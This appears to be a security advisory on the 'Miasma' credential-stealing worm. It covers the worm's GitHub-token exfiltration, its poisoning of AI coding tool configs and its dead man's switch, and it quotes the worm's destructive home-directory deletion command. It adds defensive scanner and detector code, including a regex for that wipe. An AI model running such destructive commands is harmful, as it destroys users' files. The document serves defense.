On June 10, 2026, security researchers at SafeDep disclosed that the "Miasma" credential-stealing attack framework—described as an evolution of the earlier Shai-Hulud worm—had been briefly open-sourced on GitHub. This incident marked a significant escalation in supply chain attacks, with the malware directly responsible for compromising 73 Microsoft-affiliated repositories on GitHub before the platform disabled them.
What makes Miasma particularly dangerous is its autonomous, worm-like self-propagation mechanism. Unlike traditional malware that requires human intervention or command-and-control infrastructure, Miasma uses GitHub itself as its coordination layer, infecting developer machines and leveraging stolen credentials to compromise legitimate repositories and packages. This self-sustaining cycle allows the worm to rapidly expand its reach, turning a single breach into a widespread attack affecting entire development ecosystems.
The Anatomy of a Supply Chain Worm
Miasma represents a sophisticated evolution in malware architecture, specifically designed to exploit modern software development practices. The framework operates by infecting developer machines, stealing build environments and cloud credentials, then using those privileges to compromise legitimate repositories and packages.
The malware can move laterally through SSH and AWS Systems Manager (SSM), and it specifically poisons configurations of AI coding tools such as Claude, Gemini, Cursor, Copilot, Kiro, and Cline. This AI-aware targeting is what makes Miasma particularly dangerous in the current development landscape.
One of the most alarming features is that Miasma requires no external command-and-control (C2) infrastructure to operate. Instead, it leverages GitHub itself as its coordination layer, using stolen tokens for exfiltration and coordination. This design makes detection significantly more difficult, as all traffic appears to be legitimate GitHub API calls.
Dead Man's Switch and Destructive Capabilities
The leaked Miasma source code reveals a disturbing "dead man's switch" feature. When the malware uses a victim's stolen GitHub token as an exfiltration channel, it installs a monitoring component that tracks the token's validity every minute. If the token is revoked—typically when security teams detect and revoke the compromised credentials—the malware executes a destructive command:
rm -rf ~/; rm -rf ~/Documents
This recursive deletion of the user's home and Documents directories serves both to destroy evidence and as a potential act of sabotage against the victim.
The monitor runs as a systemd user service on Linux or a LaunchAgent on macOS, and remains active for up to 72 hours. This keeps the destructive capability in place even if the initial infection vector is removed.
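A triage check for the monitor described above, as an added example (not code from SafeDep or from the leaked framework): it lists every user-level systemd service and LaunchAgent with the command it runs, and flags any that recursively delete under the home directory. The page does not give the names or contents of the real units, and an obfuscated payload will not match the pattern, so unflagged entries still need manual review.

```python
import configparser
import plistlib
import re
from pathlib import Path

# Recursive delete aimed at the home directory, as in the command quoted above.
HOME_WIPE = re.compile(r"\brm\s+-[A-Za-z]*r[A-Za-z]*\s+(~|\$HOME|\$\{HOME\}|%h)")

def job_command(path: Path) -> str:
    """Return the command line a systemd unit or LaunchAgent plist would run."""
    if path.suffix == ".plist":
        with path.open("rb") as fh:
            job = plistlib.load(fh)
        args = job.get("ProgramArguments") or [job.get("Program", "")]
        return " ".join(str(a) for a in args)
    unit = configparser.ConfigParser(strict=False, interpolation=None)
    unit.optionxform = str  # systemd keys are case-sensitive
    unit.read(path)
    return unit.get("Service", "ExecStart", fallback="")

def scan_user_persistence(dirs):
    """List every user-level job in dirs as (file, command, wipes_home)."""
    findings = []
    for d in map(Path, dirs):
        if not d.is_dir():
            continue
        for p in sorted(d.iterdir()):
            if p.suffix not in (".service", ".plist"):
                continue
            try:
                cmd = job_command(p)
            except Exception:  # malformed unit or plist: still report the file
                cmd = "<unparseable>"
            findings.append((p.name, cmd, bool(HOME_WIPE.search(cmd))))
    return findings

if __name__ == "__main__":
    home = Path.home()
    # Default per-user locations on Linux and macOS.
    for name, cmd, wipe in scan_user_persistence(
            [home / ".config/systemd/user", home / "Library/LaunchAgents"]):
        print("WIPE  " if wipe else "review", name, "->", cmd)
```

Since token revocation is the trigger, this check belongs immediately before revocation in the response sequence.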
The Five-Stage Obfuscation Pipeline
SafeDep researchers identified a sophisticated five-stage build pipeline in the Miasma code that generates unique payloads for each build. This obfuscation process combines:
- Per-file AES-256-GCM encryption of embedded assets
- Randomized string obfuscation
- Source transformations
- JavaScript obfuscation
- A self-extracting loader that wraps the final payload in three layers of encryption
Random keys and a randomized outer encoding layer ensure that each generated sample differs from previous builds. This approach makes signature-based detection and static analysis significantly harder, as each instance of the malware appears unique to traditional security tools.
The Shai-Hulud Legacy and Precedent Attacks
Miasma appears to be an evolution of the earlier Shai-Hulud worm, which was previously leaked on GitHub and shares many of the same features, techniques, and even code. The leak of Shai-Hulud led to increased attack rates as threat actors adopted the code and created more advanced variants.
The malware has previously been linked to high-profile attacks against Red Hat npm packages and, more recently, the 73 Microsoft repositories on GitHub. In each incident, researchers observed the same pattern: compromise developer credentials, then use those privileges to publish trojanized versions of packages to npm, PyPI, and RubyGems.
This playbook has proven devastatingly effective. Once an AI coding agent or developer tool is compromised, it can automatically propagate the infection to every downstream user of those tools—creating an exponential spread pattern that traditional security controls are ill-equipped to handle.
Implications for AI Coding Tools
The specific targeting of AI coding tools—Claude, Gemini, Cursor, Copilot, Kiro, and Cline—represents a new frontier in supply chain attacks. These tools have deep access to developer environments and often operate with elevated privileges to automate tasks like code completion, pull request generation, and CI/CD pipeline management.
When Miasma poisons the configuration of these AI tools, it essentially gains a permanent backdoor into every developer's workflow. The tools can then automatically propagate the infection to repositories, packages, and other developers without any direct human interaction.
This creates a terrifying scenario where a single compromised AI tool can lead to company-wide compromise within hours, as the worm spreads through the normal cadence of development work. The automated nature of these tools means they can process hundreds or thousands of repository interactions daily, each one a potential vector for the worm to spread.
Organizations using AI coding tools should immediately:
- Audit all AI tool configurations for unauthorized modifications
- Review recent pull requests and CI/CD changes for signs of tampering
- Revoke and regenerate all developer tokens that may have been exposed
- Implement stricter approval workflows for AI tool integrations
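One way to run the first audit item, as an added example that is not from SafeDep or the original page: it walks each tool's JSON config and reports every command the tool is configured to execute that is not on an approved list. The page does not say what Miasma changes in these configs, so treating executable `command` entries (hooks, MCP servers) as the thing to audit is an assumption, as are the paths in `DEFAULT_PATHS`.

```python
import json
from pathlib import Path

# Common per-user config locations (assumption: confirm against each tool's docs).
DEFAULT_PATHS = ["~/.claude/settings.json", "~/.cursor/mcp.json", "~/.gemini/settings.json"]

def configured_commands(node, trail=""):
    """Yield (json_path, command_line) for every 'command' entry in parsed JSON."""
    if isinstance(node, dict):
        cmd = node.get("command")
        if isinstance(cmd, str):
            args = node.get("args") if isinstance(node.get("args"), list) else []
            yield trail or "$", " ".join([cmd, *map(str, args)])
        for key, val in node.items():
            yield from configured_commands(val, f"{trail}.{key}" if trail else key)
    elif isinstance(node, list):
        for i, val in enumerate(node):
            yield from configured_commands(val, f"{trail}[{i}]")

def audit_ai_configs(paths, approved):
    """Return (file, json_path, command_line) for commands not in the approved set."""
    findings = []
    for p in (Path(x).expanduser() for x in paths):
        if not p.is_file():
            continue  # tool not installed or no config at this location
        try:
            doc = json.loads(p.read_text(encoding="utf-8"))
        except (OSError, ValueError) as exc:
            # A config that no longer parses is itself worth a look.
            findings.append((str(p), "$", f"<unreadable: {type(exc).__name__}>"))
            continue
        for where, line in configured_commands(doc):
            if line not in approved:
                findings.append((str(p), where, line))
    return findings

if __name__ == "__main__":
    approved = set()  # fill with the command lines your team has reviewed
    for finding in audit_ai_configs(DEFAULT_PATHS, approved):
        print(*finding, sep=" | ")
```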
Defensive Recommendations
Security teams facing the Miasma threat should implement multiple layers of defense:
Credential Management
- Implement least-privilege access for all developer credentials
- Use short-lived tokens with automatic rotation
- Monitor for anomalous API usage patterns
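One anomaly worth monitoring follows from the dead man's switch, which checks a stolen token every minute: a token that hits the same endpoint on a fixed one-minute schedule. The detector below is an added example, not code from SafeDep or the original page; the event field names (`token_id`, `path`, `ts`), the thresholds and the sample events are constructed assumptions to be mapped onto whatever API audit log is available.

```python
from collections import defaultdict

def periodic_token_checks(events, period=60.0, tolerance=5.0, min_gaps=10, share=0.8):
    """Flag (token, path) pairs whose requests recur on a fixed period.

    events: dicts with 'token_id', 'path' and 'ts' (epoch seconds).
    Returns a list of (token_id, path, requests, share_of_gaps_near_period).
    """
    series = defaultdict(list)
    for ev in events:
        series[(ev["token_id"], ev["path"])].append(float(ev["ts"]))
    flagged = []
    for (token, path), stamps in sorted(series.items()):
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        if len(gaps) < min_gaps:
            continue  # too few requests to call it a schedule
        near = sum(abs(g - period) <= tolerance for g in gaps)
        if near / len(gaps) >= share:
            flagged.append((token, path, len(stamps), round(near / len(gaps), 2)))
    return flagged

def constructed_events(base=1_700_000_000):
    """Constructed sample: one token polled about once a minute, one used by a person."""
    jitter = (0, 1, -1)
    polled = [{"token_id": "tok_polled", "path": "/example/endpoint-a",
               "ts": base + 60 * i + jitter[i % 3]} for i in range(20)]
    offsets = (0, 12, 340, 350, 2000, 2003, 2600, 4000, 4010, 4500, 7000, 7100)
    human = [{"token_id": "tok_human", "path": "/example/endpoint-b", "ts": base + o}
             for o in offsets]
    return polled + human

if __name__ == "__main__":
    for row in periodic_token_checks(constructed_events()):
        print(row)
```

Scheduled CI jobs and bots produce the same shape, so a hit is a lead to correlate with the token's owner and source host rather than a verdict.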
Build Environment Security
- Isolate build environments from development machines
- Implement code signing for all published packages
- Use containerized build environments with restricted network access
CI/CD Pipeline Protection
- Audit all repository dependencies regularly
- Implement strict review processes for build configuration changes
- Enable multi-factor authentication on all CI/CD accounts
AI Tool Governance
- Maintain an inventory of all AI coding tools in use
- Review tool configurations and permissions regularly
- Implement network segmentation for AI tool traffic
Incident Response
- Establish clear protocols for credential compromise
- Prepare template takedown requests for malicious package removal
- Maintain offline backups of critical code repositories
Conclusion
The Miasma worm represents a watershed moment in supply chain security. Its autonomous propagation mechanism, targeting of AI coding tools, and destructive dead man's switch capability demonstrate a level of sophistication previously unseen in malware designed for developer environments.
The leak of its source code on GitHub—deliberately, not accidentally—echoes the earlier Shai-Hulud leak and is expected to lead to increased attack rates as threat actors adopt the code and create further variants. The self-replicating nature of the worm means that each new adoption increases the threat surface exponentially.
Organizations must treat AI-aware supply chain attacks as a new class of threat requiring specialized defense strategies. Traditional security controls that rely on signature detection are fundamentally inadequate against malware that generates unique payloads for each infection and uses legitimate API traffic for coordination.
The incident underscores the urgent need for:
- Enhanced monitoring of developer credential usage
- Stricter controls on AI coding tool configurations
- Improved supply chain transparency and verification
- Rapid response capabilities for credential compromise incidents
As the attack landscape continues to evolve, security teams must prioritize defenses that can detect and respond to anomalies in real-time—before a single compromised credential spirals into company-wide or even industry-wide compromise.